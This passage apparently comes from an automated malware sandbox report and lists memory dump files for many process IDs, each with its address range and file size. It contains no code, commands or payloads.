                  • memory/1256-338-0x0000000000000000-mapping.dmp
                  • memory/1456-307-0x0000000072340000-0x0000000072A2E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1456-358-0x0000000000A10000-0x0000000000A34000-memory.dmp
                    Filesize

                    144KB

                  • memory/1456-356-0x00000000004A0000-0x00000000004C3000-memory.dmp
                    Filesize

                    140KB

                  • memory/1456-304-0x0000000000000000-mapping.dmp
                  • memory/1456-308-0x0000000000A40000-0x0000000000A41000-memory.dmp
                    Filesize

                    4KB

                  • memory/1540-277-0x0000000000400000-0x0000000000434000-memory.dmp
                    Filesize

                    208KB

                  • memory/1540-275-0x0000000000417A8B-mapping.dmp
                  • memory/1540-273-0x0000000000400000-0x0000000000434000-memory.dmp
                    Filesize

                    208KB

                  • memory/1572-13-0x0000000000000000-mapping.dmp
                  • memory/1612-619-0x0000000010530000-0x000000001054A000-memory.dmp
                    Filesize

                    104KB

                  • memory/1612-311-0x0000000000000000-mapping.dmp
                  • memory/1612-367-0x0000000002D60000-0x0000000002DAC000-memory.dmp
                    Filesize

                    304KB

                  • memory/1612-608-0x0000000050480000-0x000000005049A000-memory.dmp
                    Filesize

                    104KB

                  • memory/1624-8-0x0000000000000000-mapping.dmp
                  • memory/1660-15-0x0000000000000000-mapping.dmp
                  • memory/1668-299-0x0000000000400000-0x0000000000420000-memory.dmp
                    Filesize

                    128KB

                  • memory/1668-302-0x0000000000400000-0x0000000000420000-memory.dmp
                    Filesize

                    128KB

                  • memory/1668-300-0x000000000041A684-mapping.dmp
                  • memory/1732-333-0x0000000000640000-0x0000000000651000-memory.dmp
                    Filesize

                    68KB

                  • memory/1732-344-0x00000000008A0000-0x00000000008B0000-memory.dmp
                    Filesize

                    64KB

                  • memory/1732-341-0x0000000000660000-0x0000000000663000-memory.dmp
                    Filesize

                    12KB

                  • memory/1732-319-0x0000000000000000-mapping.dmp
                  • memory/1732-328-0x00000000005B0000-0x00000000005B1000-memory.dmp
                    Filesize

                    4KB

                  • memory/1732-325-0x00000000009C0000-0x00000000009C1000-memory.dmp
                    Filesize

                    4KB

                  • memory/1732-323-0x0000000072340000-0x0000000072A2E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1804-11-0x0000000000000000-mapping.dmp
                  • memory/1832-497-0x0000000000000000-mapping.dmp
                  • memory/1832-529-0x0000000000000000-mapping.dmp
                  • memory/1832-610-0x0000000000000000-mapping.dmp
                  • memory/1832-609-0x0000000003C80000-0x0000000003C81000-memory.dmp
                    Filesize

                    4KB

                  • memory/1832-607-0x0000000000000000-mapping.dmp
                  • memory/1832-605-0x0000000000000000-mapping.dmp
                  • memory/1832-603-0x0000000000000000-mapping.dmp
                  • memory/1832-601-0x0000000000000000-mapping.dmp
                  • memory/1832-599-0x0000000000000000-mapping.dmp
                  • memory/1832-597-0x0000000000000000-mapping.dmp
                  • memory/1832-595-0x0000000000000000-mapping.dmp
                  • memory/1832-593-0x0000000000000000-mapping.dmp
                  • memory/1832-591-0x0000000000000000-mapping.dmp
                  • memory/1832-589-0x0000000000000000-mapping.dmp
                  • memory/1832-587-0x0000000000000000-mapping.dmp
                  • memory/1832-585-0x0000000000000000-mapping.dmp
                  • memory/1832-583-0x0000000000000000-mapping.dmp
                  • memory/1832-581-0x0000000000000000-mapping.dmp
                  • memory/1832-579-0x0000000000000000-mapping.dmp
                  • memory/1832-577-0x0000000000000000-mapping.dmp
                  • memory/1832-575-0x0000000000000000-mapping.dmp
                  • memory/1832-573-0x0000000000000000-mapping.dmp
                  • memory/1832-571-0x0000000000000000-mapping.dmp
                  • memory/1832-569-0x0000000000000000-mapping.dmp
                  • memory/1832-567-0x0000000000000000-mapping.dmp
                  • memory/1832-565-0x0000000000000000-mapping.dmp
                  • memory/1832-563-0x0000000000000000-mapping.dmp
                  • memory/1832-561-0x0000000000000000-mapping.dmp
                  • memory/1832-559-0x0000000000000000-mapping.dmp
                  • memory/1832-557-0x0000000000000000-mapping.dmp
                  • memory/1832-555-0x0000000000000000-mapping.dmp
                  • memory/1832-553-0x0000000000000000-mapping.dmp
                  • memory/1832-551-0x0000000000000000-mapping.dmp
                  • memory/1832-549-0x0000000000000000-mapping.dmp
                  • memory/1832-547-0x0000000000000000-mapping.dmp
                  • memory/1832-545-0x0000000000000000-mapping.dmp
                  • memory/1832-543-0x0000000000000000-mapping.dmp
                  • memory/1832-541-0x0000000000000000-mapping.dmp
                  • memory/1832-539-0x0000000000000000-mapping.dmp
                  • memory/1832-537-0x0000000000000000-mapping.dmp
                  • memory/1832-535-0x0000000000000000-mapping.dmp
                  • memory/1832-533-0x0000000000000000-mapping.dmp
                  • memory/1832-531-0x0000000000000000-mapping.dmp
                  • memory/1832-527-0x0000000000000000-mapping.dmp
                  • memory/1832-525-0x0000000000000000-mapping.dmp
                  • memory/1832-523-0x0000000000000000-mapping.dmp
                  • memory/1832-521-0x0000000000000000-mapping.dmp
                  • memory/1832-519-0x0000000000000000-mapping.dmp
                  • memory/1832-517-0x0000000000000000-mapping.dmp
                  • memory/1832-515-0x0000000000000000-mapping.dmp
                  • memory/1832-513-0x0000000000000000-mapping.dmp
                  • memory/1832-511-0x0000000000000000-mapping.dmp
                  • memory/1832-509-0x0000000000000000-mapping.dmp
                  • memory/1832-507-0x0000000000000000-mapping.dmp
                  • memory/1832-505-0x0000000000000000-mapping.dmp
                  • memory/1832-503-0x0000000000000000-mapping.dmp
                  • memory/1832-501-0x0000000000000000-mapping.dmp
                  • memory/1832-499-0x0000000000000000-mapping.dmp
                  • memory/1832-495-0x0000000000000000-mapping.dmp
                  • memory/1832-493-0x0000000000000000-mapping.dmp
                  • memory/1832-491-0x0000000000000000-mapping.dmp
                  • memory/1832-489-0x0000000000000000-mapping.dmp
                  • memory/1832-487-0x0000000000000000-mapping.dmp
                  • memory/1832-485-0x0000000000000000-mapping.dmp
                  • memory/1832-483-0x0000000000000000-mapping.dmp
                  • memory/1832-481-0x0000000000000000-mapping.dmp
                  • memory/1832-479-0x0000000000000000-mapping.dmp
                  • memory/1832-477-0x0000000000000000-mapping.dmp
                  • memory/1832-475-0x0000000000000000-mapping.dmp
                  • memory/1832-473-0x0000000000000000-mapping.dmp
                  • memory/1832-471-0x0000000000000000-mapping.dmp
                  • memory/1832-469-0x0000000000000000-mapping.dmp
                  • memory/1832-467-0x0000000000000000-mapping.dmp
                  • memory/1832-465-0x0000000000000000-mapping.dmp
                  • memory/1832-463-0x0000000000000000-mapping.dmp
                  • memory/1832-368-0x00000000000A0000-0x00000000000A1000-memory.dmp
                    Filesize

                    4KB

                  • memory/1832-369-0x0000000000000000-mapping.dmp
                  • memory/1832-370-0x0000000000120000-0x0000000000121000-memory.dmp
                    Filesize

                    4KB

                  • memory/1832-371-0x0000000000000000-mapping.dmp
                  • memory/1832-373-0x0000000000000000-mapping.dmp
                  • memory/1832-375-0x0000000000000000-mapping.dmp
                  • memory/1832-377-0x0000000000000000-mapping.dmp
                  • memory/1832-379-0x0000000000000000-mapping.dmp
                  • memory/1832-381-0x0000000000000000-mapping.dmp
                  • memory/1832-383-0x0000000000000000-mapping.dmp
                  • memory/1832-385-0x0000000000000000-mapping.dmp
                  • memory/1832-387-0x0000000000000000-mapping.dmp
                  • memory/1832-389-0x0000000000000000-mapping.dmp
                  • memory/1832-391-0x0000000000000000-mapping.dmp
                  • memory/1832-393-0x0000000000000000-mapping.dmp
                  • memory/1832-395-0x0000000000000000-mapping.dmp
                  • memory/1832-397-0x0000000000000000-mapping.dmp
                  • memory/1832-399-0x0000000000000000-mapping.dmp
                  • memory/1832-401-0x0000000000000000-mapping.dmp
                  • memory/1832-403-0x0000000000000000-mapping.dmp
                  • memory/1832-405-0x0000000000000000-mapping.dmp
                  • memory/1832-407-0x0000000000000000-mapping.dmp
                  • memory/1832-409-0x0000000000000000-mapping.dmp
                  • memory/1832-411-0x0000000000000000-mapping.dmp
                  • memory/1832-413-0x0000000000000000-mapping.dmp
                  • memory/1832-415-0x0000000000000000-mapping.dmp
                  • memory/1832-417-0x0000000000000000-mapping.dmp
                  • memory/1832-419-0x0000000000000000-mapping.dmp
                  • memory/1832-421-0x0000000000000000-mapping.dmp
                  • memory/1832-423-0x0000000000000000-mapping.dmp
                  • memory/1832-425-0x0000000000000000-mapping.dmp
                  • memory/1832-427-0x0000000000000000-mapping.dmp
                  • memory/1832-429-0x0000000000000000-mapping.dmp
                  • memory/1832-431-0x0000000000000000-mapping.dmp
                  • memory/1832-433-0x0000000000000000-mapping.dmp
                  • memory/1832-435-0x0000000000000000-mapping.dmp
                  • memory/1832-437-0x0000000000000000-mapping.dmp
                  • memory/1832-439-0x0000000000000000-mapping.dmp
                  • memory/1832-441-0x0000000000000000-mapping.dmp
                  • memory/1832-443-0x0000000000000000-mapping.dmp
                  • memory/1832-445-0x0000000000000000-mapping.dmp
                  • memory/1832-447-0x0000000000000000-mapping.dmp
                  • memory/1832-449-0x0000000000000000-mapping.dmp
                  • memory/1832-451-0x0000000000000000-mapping.dmp
                  • memory/1832-453-0x0000000000000000-mapping.dmp
                  • memory/1832-455-0x0000000000000000-mapping.dmp
                  • memory/1832-457-0x0000000000000000-mapping.dmp
                  • memory/1832-459-0x0000000000000000-mapping.dmp
                  • memory/1832-461-0x0000000000000000-mapping.dmp
                  • memory/1844-10-0x0000000000000000-mapping.dmp
                  • memory/1876-75-0x0000000005AB0000-0x0000000005AB1000-memory.dmp
                    Filesize

                    4KB

                  • memory/1876-174-0x0000000006720000-0x0000000006721000-memory.dmp
                    Filesize

                    4KB

                  • memory/1876-81-0x0000000006570000-0x0000000006571000-memory.dmp
                    Filesize

                    4KB

                  • memory/1876-32-0x0000000000000000-mapping.dmp
                  • memory/1876-34-0x0000000072290000-0x000000007297E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1876-115-0x0000000006660000-0x0000000006661000-memory.dmp
                    Filesize

                    4KB

                  • memory/1876-173-0x0000000006710000-0x0000000006711000-memory.dmp
                    Filesize

                    4KB

                  • memory/1876-67-0x0000000005970000-0x0000000005971000-memory.dmp
                    Filesize

                    4KB

                  • memory/1876-62-0x0000000005920000-0x0000000005921000-memory.dmp
                    Filesize

                    4KB

                  • memory/1876-68-0x0000000006480000-0x0000000006481000-memory.dmp
                    Filesize

                    4KB

                  • memory/1904-16-0x0000000000000000-mapping.dmp
                  • memory/1928-288-0x0000000000000000-mapping.dmp
                  • memory/1936-24-0x0000000072290000-0x000000007297E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1936-17-0x0000000000000000-mapping.dmp
                  • memory/1944-330-0x0000000000000000-mapping.dmp
                  • memory/1948-18-0x0000000000000000-mapping.dmp
                  • memory/1948-25-0x0000000072290000-0x000000007297E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1956-42-0x0000000004980000-0x0000000004981000-memory.dmp
                    Filesize

                    4KB

                  • memory/1956-23-0x0000000072290000-0x000000007297E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1956-19-0x0000000000000000-mapping.dmp
                  • memory/1956-36-0x0000000002530000-0x0000000002531000-memory.dmp
                    Filesize

                    4KB

                  • memory/1956-48-0x0000000002650000-0x0000000002651000-memory.dmp
                    Filesize

                    4KB

                  • memory/1988-27-0x0000000000000000-mapping.dmp
                  • memory/2040-29-0x0000000000000000-mapping.dmp
                  • memory/2112-259-0x0000000000000000-mapping.dmp
                  • memory/2228-200-0x0000000000417A8B-mapping.dmp
                  • memory/2240-280-0x0000000000410000-0x0000000000411000-memory.dmp
                    Filesize

                    4KB

                  • memory/2240-296-0x00000000004A0000-0x00000000004C4000-memory.dmp
                    Filesize

                    144KB

                  • memory/2240-278-0x0000000000E80000-0x0000000000E81000-memory.dmp
                    Filesize

                    4KB

                  • memory/2240-274-0x0000000073B80000-0x000000007426E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/2240-270-0x0000000000000000-mapping.dmp
                  • memory/2244-612-0x0000000000000000-mapping.dmp
                  • memory/2272-287-0x0000000000000000-mapping.dmp
                  • memory/2340-314-0x0000000000000000-mapping.dmp
                  • memory/2340-340-0x0000000004DC0000-0x0000000004DC2000-memory.dmp
                    Filesize

                    8KB

                  • memory/2340-335-0x0000000000500000-0x0000000000510000-memory.dmp
                    Filesize

                    64KB

                  • memory/2340-332-0x00000000005B0000-0x00000000005B5000-memory.dmp
                    Filesize

                    20KB

                  • memory/2340-324-0x0000000000930000-0x0000000000931000-memory.dmp
                    Filesize

                    4KB

                  • memory/2340-331-0x0000000000520000-0x0000000000532000-memory.dmp
                    Filesize

                    72KB

                  • memory/2340-329-0x0000000000430000-0x0000000000431000-memory.dmp
                    Filesize

                    4KB

                  • memory/2340-317-0x0000000072340000-0x0000000072A2E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/2460-105-0x0000000000000000-mapping.dmp
                  • memory/2472-120-0x0000000000A90000-0x0000000000A91000-memory.dmp
                    Filesize

                    4KB

                  • memory/2472-208-0x0000000004A20000-0x0000000004AD0000-memory.dmp
                    Filesize

                    704KB

                  • memory/2472-220-0x0000000002010000-0x000000000201D000-memory.dmp
                    Filesize

                    52KB

                  • memory/2472-106-0x0000000000000000-mapping.dmp
                  • memory/2472-111-0x0000000072290000-0x000000007297E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/2500-230-0x00000000026A0000-0x00000000026A4000-memory.dmp
                    Filesize

                    16KB

                  • memory/2500-219-0x0000000000000000-mapping.dmp
                  • memory/2548-224-0x0000000000400000-0x0000000000493000-memory.dmp
                    Filesize

                    588KB

                  • memory/2548-222-0x000000000043FCC3-mapping.dmp
                  • memory/2548-221-0x0000000000400000-0x0000000000493000-memory.dmp
                    Filesize

                    588KB

                  • memory/2552-119-0x0000000000000000-mapping.dmp
                  • memory/2572-321-0x0000000000000000-mapping.dmp
                  • memory/2584-352-0x0000000005520000-0x0000000005521000-memory.dmp
                    Filesize

                    4KB

                  • memory/2584-351-0x0000000002870000-0x0000000002871000-memory.dmp
                    Filesize

                    4KB

                  • memory/2584-350-0x0000000004A00000-0x0000000004A01000-memory.dmp
                    Filesize

                    4KB

                  • memory/2584-349-0x0000000000CC0000-0x0000000000CC1000-memory.dmp
                    Filesize

                    4KB

                  • memory/2584-348-0x0000000072340000-0x0000000072A2E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/2584-345-0x0000000000000000-mapping.dmp
                  • memory/2596-126-0x0000000000000000-mapping.dmp
                  • memory/2640-185-0x000007FEF8550000-0x000007FEF87CA000-memory.dmp
                    Filesize

                    2.5MB

                  • memory/2656-133-0x0000000000000000-mapping.dmp
                  • memory/2700-142-0x000000000043FCC3-mapping.dmp
                  • memory/2700-144-0x0000000000400000-0x0000000000498000-memory.dmp
                    Filesize

                    608KB

                  • memory/2700-141-0x0000000000400000-0x0000000000498000-memory.dmp
                    Filesize

                    608KB

                  • memory/2776-151-0x0000000000000000-mapping.dmp
                  • memory/2808-156-0x0000000000000000-mapping.dmp
                  • memory/2840-166-0x000000000043FCC3-mapping.dmp
                  • memory/2876-357-0x0000000000000000-mapping.dmp
                  • memory/2876-363-0x0000000002850000-0x0000000002851000-memory.dmp
                    Filesize

                    4KB

                  • memory/2876-364-0x0000000005500000-0x0000000005501000-memory.dmp
                    Filesize

                    4KB

                  • memory/2876-361-0x0000000002630000-0x0000000002631000-memory.dmp
                    Filesize

                    4KB

                  • memory/2876-360-0x0000000072340000-0x0000000072A2E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/2876-362-0x0000000004A80000-0x0000000004A81000-memory.dmp
                    Filesize

                    4KB

                  • memory/2900-256-0x0000000000000000-mapping.dmp
                  • memory/2904-257-0x0000000000000000-mapping.dmp
                  • memory/2932-176-0x0000000000400000-0x0000000000439000-memory.dmp
                    Filesize

                    228KB

                  • memory/2932-183-0x0000000000400000-0x0000000000439000-memory.dmp
                    Filesize

                    228KB

                  • memory/2932-177-0x0000000000417A8B-mapping.dmp
                  • memory/2944-261-0x0000000000000000-mapping.dmp
                  • memory/2984-191-0x0000000000400000-0x0000000000425000-memory.dmp
                    Filesize

                    148KB

                  • memory/2984-186-0x0000000000400000-0x0000000000425000-memory.dmp
                    Filesize

                    148KB

                  • memory/2984-189-0x000000000041A684-mapping.dmp
                  • memory/3024-258-0x0000000000000000-mapping.dmp